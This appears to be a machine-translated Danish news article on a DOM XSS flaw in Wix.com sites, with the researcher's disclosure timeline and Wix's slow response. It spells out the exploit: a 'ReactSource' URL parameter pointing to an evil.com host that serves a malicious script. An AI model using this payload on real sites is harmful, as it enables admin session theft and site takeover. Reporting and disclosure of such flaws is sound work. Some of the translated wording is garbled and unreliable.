Har du hørt om Wix(.)med?
Wix.com er en cloud-baseret web-udvikling platform designet til brugere at bygge HTML5 websteder og mobile sites ved hjælp af selskabets online træk og slip-værktøjer.
Desværre, en alvorlig XSS fejl er blevet opdaget på platformen i øjeblikket truer millioner af hjemmesider og brugere.
Wix(.)com har en alvorlig XSS bug, forsker siger
Som rapporteret af sikkerhedseksperter, tjenesten er vært for millioner af hjemmesider med 87 million registrerede brugere. Den skræmmende del er, at alle brugere er i øjeblikket udsat for denne XSS sårbarhed. Sidstnævnte kan anvendes af angribere i en ormelignende måde at overtage administratorkonti. Når dette er gjort, angriberne opnå fuld kontrol over de kompromitterede hjemmesider.
Den XSS sårbarhed blev beskrevet af Matt Austin fra Contrast Sikkerhed. Han skrev:
Wix.com har en alvorlig DOM XSS sårbarhed, der gør det muligt for en hacker fuld kontrol over alle websteder vært på Wix. Blot ved at tilføje en enkelt parameter til et websted skabt på Wix, hackeren kan forårsage deres JavaScript til at blive lastet og køre som en del af målet hjemmeside.
En simpel linje kode er nok til at udløse fejlen
Angrebet kan udløses kun ved at tilføje en simpel omdirigering kommando til enhver URL fra Wix(.)med. Resultatet bliver omdirigeret til ondsindede JavaScrip. Et eksempel nedenfor:
- Tilføje: ?ReactSource = https://evil.com til enhver webadresse til et websted oprettet på wix.com.
- Sørg evil.com vært for en skadelig fil på /packages-bin/wixCodeInit/wixCodeInit.min.js
Disse enkle linjer af koder er nok for angriberne at være sikker på, at deres JS er indlæst og aktiveres som en del af den målrettede website, forskeren forklarer. Angribere er også i stand til at få adgang til admin session cookies og ressourcer, en meget dårlig situation faktisk. Når en session cookie høstes, angribere kan frit placere DOM XSS i en iframe. Dette gøres for at være vært for skadeligt indhold på enhver hjemmeside administreres af en operatør.
efter succes, dette angreb kan udnyttes for malware fordeling, website modifikation, cryptocurrency minedrift, ændre kontooplysninger, etc.
Hvad sagde Wix sige?
Med hensyn til kommunikationen med Wix(.)med, forskeren deler følgende oplevelse:
Oktober 10: Opretter Støtte billet anmoder om sikkerhed kontakt
Oktober 11: Ræk ud til @wix på kvidre at finde en sikkerhed kontakt. Svarede at bruge standard support. Gav detaljer i skabte billet. Billet side fungerer ikke længere. https://www.wix.com/support/html5/contact.
Oktober 14: Modtaget standard ”Vi undersøger sagen og vil følge op så hurtigt som muligt” svar fra Wix.
Oktober 20: Svar på billet anmoder om en opdatering. (ingen reaktion)
Oktober 27: Anden anmodning om en opdatering. (ingen reaktion)
Oktober 28, forskeren endelig modtaget en reagere som fastslog, at den
gruppe, du forsøgte at kontakte (sikkerhed) måske ikke eksisterer, eller du har måske ikke tilladelse til at skrive indlæg til gruppen.
Ikke desto mindre, administrerende direktør for Wix Avishai Abrahami til sidst indrømmede, at visse aspekter af platformen er baseret på WordPress open source bibliotek. Han hævder, at uanset blev forbedret udkom tilbage til samfundet, ZDNet rapporter.